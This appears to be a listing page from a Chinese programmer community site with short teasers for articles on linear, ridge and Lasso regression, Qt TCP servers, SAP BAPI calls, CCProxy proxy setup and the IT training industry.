    机器学习总结(一):线性回归、岭回归、Lasso回归线性回归作为一种回归分析技术,其分析的因变量属于连续型变量,如果因变量转变为离散型变量,将转换为分类问题。回归分析属于有监督学习问题,本博客将重点回顾标准线性回归知识点,并就线性回归中可能出现的问题进行简单探讨,引出线性回归的两个变种岭回归以及Lasso回归,最后通过sklearn库模拟整个回归过程。目录结构线性回归的一般形式线性回归中可能遇到的问题过拟合问题及其解决方法线性回归代码实现

  • qt中Qtcpserver服务端_qt websocket

    qt中Qtcpserver服务端_qt websocket0.前言本文主要讲解QtTCP相关接口的基本应用,一些实践相关的后面会单独写。TCP协议是一种面向连接的、可靠的、基于字节流的传输层通信协议。TCP通过检验和、序列号、确认应答、重发控制、连接管理以及窗口控制等机制实现可靠性传输。TCP通过三次握手来建立可靠的连接。TCP四次挥手断开连接。TCP连接是双向的,在四次挥手中,前两次挥手用于断开一个方向的连接,后两次挥手用于断开另一方向的连接。TCP知识参考:https://blog.csdn.net/sinat_36

  • BAPI 记录

    BAPI 记录采购订单BAPI_PO_CREATE1采购订单创建交货单BAPI_OUTB_DELIVERY_CREATE_STO根据凭证类型获取TVAK-VBTYP判断要创建的SO类别不同类别调用不同BAPI创建SOBAPI_SALESORDER_CREATEFROMDAT2创建SO退货BAPI_CUSTOMERRETURN_CREATE创建SO借贷项凭证SD_SALES…

  • ccproxy设置外网代理方法_cc代理ip

    ccproxy设置外网代理方法_cc代理ipCCProxy代理上网设置方法

    2022年10月30日
  • IT培训行业揭秘(一)

    IT培训行业揭秘(一)前言:闲扯淡IT培训行业的各种你不知道的事情!

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号